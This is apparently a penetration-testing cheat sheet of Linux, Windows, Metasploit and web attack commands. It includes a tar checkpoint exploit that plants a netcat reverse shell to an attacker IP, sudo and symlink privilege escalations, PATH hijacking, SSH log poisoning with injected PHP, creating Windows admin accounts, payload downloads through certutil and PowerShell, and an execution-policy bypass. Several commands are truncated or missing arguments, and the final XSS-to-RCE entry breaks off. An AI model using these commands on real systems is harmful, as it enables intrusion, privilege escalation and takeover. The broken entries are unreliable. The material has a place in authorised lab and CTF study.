# Linux
### Stablilize Shell
1. ctrl+z
2. stty raw -echo
3. fg (press enter x2)
4. export TERM=xterm , for using `clear` command
### Spawn bash
* /usr/bin/script -qc /bin/bash 1&>/dev/null
* python -c 'import pty;pty.spawn("/bin/bash")'
* python3 -c 'import pty;pty.spawn("/bin/bash")'
### Vulnerable sudo (ALL,!root)
`sudo -u#-1 whoami`
`sudo -u#-1 `
### Execute as diffent user
`sudo -u `
### FTP
Connect to ftp on the machine
`ftp user `
After successfully logged in you can download all files with
`mget *`
Download files recusively
` wget -r ftp://user:pass@/ `
### SMB Shares
#### SmbClient
* `smbclient -L \\\\\\` accessing a share anonymously
* `smbclient \\\\10.10.209.122\\ -U `accessing a share with an authorized user
#### Smbmap
* `smbmap -u -p -H `
#### Smbget
* `smbget -R smb:///`
### NFS shares
* `showmount -e ` This lists the nfs shares
* `mount -t nfs :/` Mounting that share
### Cronjobs
* cronjobs for specific users are stored in `/var/spool/cron/cronjobs/`
* `crontab -u -e ` Check cronjobs for a specific user
* `crontab -l` cronjob for the current user
* `cat /etc/crontab` system wide cronjobs
### Finding Binaries
* find . - perm /4000 (user id uid)
* find . -perm /2000 (group id guid)
### Finding File capabilites
`getcap -r / 2>/dev/null`
### Finding text in a files
`grep -rnw '/path/to/somewhere/' -e 'pattern'
`
### Changing file attributes
chattr + i filename `making file immutable`
chattr -i filename `making file mutable`
lschattr filename `Checking file attributes`
### Uploading Files
scp file/you/want `user@ip`:/path/to/store
python -m SimpleHTTPServer [port] `By default will listen on 8000`
python3 -m http.server [port] `By default will listen on 8000`
### Downloading Files
`wget http://:port/`
### Netcat to download files from target
`nc -l -p [port] > file` Receive file
`nc -w 3 [ip] [port] < file `Send file
### Cracaking Zip Archive
`fcrackzip -u -D -p `
### Decrypting PGP key
If you have `asc` key which can be used for PGP authentication then
* john key.asc > asc_hash
* john asc_hash --wordlists=path_to_wordlist
#### Having pgp cli
* pgp --import key.asc
* pgp --decrypt file.pgp
#### Having gpg cli
* gpg --import key.asc
* gpg --decrypt file.pgp
### killing a running job in same shell
`jobs`
```
Find it's job number
$ jobs
[1]+ Running sleep 100 &
$ kill %1
[1]+ Terminated sleep 100
```
### SSH Port Forwarding
`ssh -L :localhost:@`
### SSH auth log poisoning
Login as any user to see that it gets logged then try to login with a malicious php code
`ssh ''@192.168.43.2`
Then `http://ip/page?a=whoami;`
### Getting root with ln (symlink)
If we have permissions to run /usr/bin/ln as root we can onw the machine
```
echo 'bash' > root
chmod +x root
sudo /usr/bin/ln -sf /tmp/root /usr/bin/ln
sudo /usr/bin/ln
```
### Tar Exploitation
When ever you see a cronjob running with a command `cd //andre/backup tar -zcf //filetar.gz *` go to that folder from which a backup is being created and running these command in that directory
```
echo "mkfifo /tmp/lhennp; nc 10.2.54.209 8888 0/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
```
### Binary Exploits
If there is a certain command running in a binary example `date` so we can create our own binary and add `/bin/bash` to and path so it gets executed
`export PATH=/:$PATH`
### Enumration
* cat /etc/*release
* cat /etc/issue
* uname -a
* lsb_release -a
* Running Linpeas
* ss -tulpn (for ports that are open on the machine)
# Windows
### Adding User
net user "USER_NAME" "PASS" /add
### Changing User's password
net user "USER_NAME" "NEWPASS"
### Adding User to Administrators
net localgroup administrators "USER_NAME" /add
### Changing File Permissions
CACLS files /e /p {USERNAME}:{PERMISSION}
Permissions:
1.R `Read`
2.W `Write`
3.C `Change`
4.F `Full Control`
### Set File bits
attrib +r filename `add read only bit`
attrib -r filename `remove read only bit`
attrib +h filename `add hidden bit `
attrib -h filename `remove hidden bit`
### Show hidden file/folder
dir /a `show all hidden files & folder`
dir /a:d `show only hidden folder`
dir /a:h `show only hidden files`
### Downloading Files
`certutil.exe -urlcache -f http://:/ ouput.exe`
`powershell -c "wget http://:/" -outfile output.exe`
`powershell Invoke-WebRequest -Uri $ip -OutFile $filepath`
### Active Directory
`powershell -ep bypass` load a powershell shell with execution policy bypassed
`. .\PowerView.ps1` import the PowerView module
## List Drives
`wmic logicaldisk get caption`
## Decrypting PSCredential Object
* $file = Import-Clixml -Path
* $file.GetNetworkCredential().username
* $file.GetNetworkCredential().password
# Msfvenom
### List All Payloads
msfvenom -l payloads
### List Payload Format
msfvenom --list formats
# Meterpreter
### Adding user for RDP
run getgui -u [USER_NAME] -p [PASS]
# Git
### Dumping repository
`./gitdumper.sh `
### Extracting information from repository
`./extractor.sh `
# Web
### XSS to RCE
```
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Victim: